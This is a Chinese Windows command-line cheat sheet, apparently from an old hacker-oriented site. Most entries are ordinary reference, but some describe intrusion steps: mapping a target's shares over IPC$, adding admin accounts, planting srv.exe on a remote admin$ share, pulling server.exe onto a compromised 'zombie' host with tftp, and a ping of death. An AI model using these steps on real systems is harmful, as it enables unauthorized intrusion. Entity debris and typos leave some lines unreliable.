net use h: $"\\ip\c$Content$nbsp;登陆后映射对方C:到本地为H:

net use $"\\ip\ipc$Content$nbsp;/del 删除IPC链接

net use h: /del 删除映射对方到本地的为H:的映射

net user 用户名 密码 /add 建立用户

net user guest /active:yes 激活guest用户

net user 查看有哪些用户

net user 帐户名 查看帐户的属性

net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数

net start 查看开启了哪些服务

net start 服务名 开启服务;(如:net start telnet, net start schedule)

net stop 服务名 停止某服务

net time \\目标ip 查看对方时间

net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息

net view 查看本地局域网内开启了哪些共享

net view \\ip 查看对方局域网内开启了哪些共享

net config 显示系统 *** 设置

net logoff 断开连接的共享

net pause 服务名 暂停某服务

net send ip "文本信息" 向对方发信息

net ver 局域网内正在使用的 *** 连接类型和信息

net share 查看本地开启的共享

net share ipc$Content$nbsp;开启ipc$共享

net share ipc$Content$nbsp;/del 删除ipc$共享

net share c$Content$nbsp;/del 删除C:共享

net user guest 12345 用guest用户登陆后用将密码改为12345

net password 密码 更改系统登陆密码

netstat -a 查看开启了哪些端口,常用netstat -an

netstat -n 查看端口的 *** 连接情况,常用netstat -an

netstat -v 查看正在进行的工作

netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)

netstat -s 查看正在使用的所有协议使用情况

nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写

tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。

ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。

ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)

ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息

tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)

kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)

del -F 文件名加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件

del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)

move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖

fc one.txt two.txt 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中," "和" " 是重定向命令

at id号 开启已注册的某个计划任务

at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止

at id号 /delete 停止某个已注册的计划任务

at 查看所有的计划任务

at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机

finger username @host 查看最近有哪些用户登陆

telnet ip 端口 远和登陆服务器,默认端口为23

open ip 连接到IP(属telnet登陆后的命令)

telnet 在本机上直接键入telnet 将进入本机的telnet

copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件

copy c:\srv.exe $"\\ip\admin$Content$nbsp;复制本地c:\srv.exe到对方的admin下

cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件

copy $\svv.exe"\\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C:

xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件

tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送

tftp -i 对方IP put c:\server.exe 登陆后,上传本地c:\server.exe至主机

ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)

route print 显示出IP路由,将主要显示 *** 地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface

arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息

start 程序名或命令 /max 或/min 新开一个新窗口并更大化(最小化)运行某程序或命令

mem 查看cpu使用情况

attrib 文件名(目录名) 查看某文件(目录)的属性

attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性

dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间

date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间

set 指定环境变量名称=要指派给变量的字符 设置环境变量

set 显示当前所有的环境变量

set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量

pause 暂停批处理程序,并显示出:请按任意键继续....

if 在批处理程序中执行条件处理(更多说明见if命令及变量)

goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)

call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?)

for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)

echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置

echo 信息 在屏幕上显示出信息

echo 信息 pass.txt 将"信息"保存到pass.txt文件中

findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello

find 文件名 查找某文件

title 标题名字 更改CMD窗口标题名字

color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白

prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为:EntSky\ )

print 文件名 打印文本文件

ver 在DOS窗口下显示版本信息

winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)

format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS

md 目录名 创建目录

replace 源文件 要替换文件的目录 替换文件

ren 原文件名 新文件名 重命名文件名

tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称

type 文件名 显示文本文件的内容

more 文件名 逐屏显示输出文件

doskey 要锁定的命令=字符

doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:

doskey dir= taskmgr 调出任务管理器 chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误 tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口 exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe path 路径\可执行文件的文件名为可执行文件设置一个路径。 cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /? regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示; regedit /e 注册表文件名 导出注册表 cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。 cacls 文件名 查看文件的访问用户权限列表 REM 文本内容 在批处理文件中添加注解 netsh 查看或更改本地 *** 配置情况 IIS服务命令: iisreset /reboot 重启win2k计算机(但有提示系统将重启信息出现) iisreset /start或stop 启动(停止)所有Internet服务 iisreset /restart 停止然后重新启动所有Internet服务 iisreset /status 显示所有Internet服务状态 iisreset /enable或disable 在本地系统上启用(禁用)Internet服务的重新启动 iisreset /rebootonerror 当启动、停止或重新启动Internet服务时,若发生错误将重新开机 iisreset /noforce 若无法停止Internet服务,将不会强制终止Internet服务 iisreset /timeout Val在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。 FTP 命令: (后面有详细说明内容) ftp的命令行格式为: ftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息。 -d 使用调试方式。 -n 限制ftp的自动登录,即不使用.netrc文件。 -g 取消全局文件名。 help [命令] 或 ?[命令] 查看命令说明 bye 或 quit 终止主机FTP进程,并退出FTP管理方式. pwd 列出当前远端主机目录 put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中 get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中 mget [remote-files] 从远端主机接收一批文件至本地主机 mput local-files 将本地主机中一批文件传送至远端主机 dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件 ascii 设定以ASCII方式传送文件(缺省值) bin 或 image 设定以二进制方式传送文件 bell 每完成一次文件传送,报警提示 cdup 返回上一级目录 close 中断与远程服务器的ftp会话(与open对应) open host[port] 建立指定ftp服务器连接,可指定连接端口 delete 删除远端主机中的文件 mdelete [remote-files] 删除一批文件

  • 评论列表:
  •  离鸢未芩
     发布于 2022-07-28 13:49:07  回复该评论
  • 处输出到3st.txt文件中," "和" " 是重定向命令 at id号 开启已注册的某个计划任务 at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止 at id号 /delete 停止某个已注册的计划任务 at 查看所有的计划任务 at \\ip tim

发表评论:

Powered By

Copyright Your WebSite.Some Rights Reserved.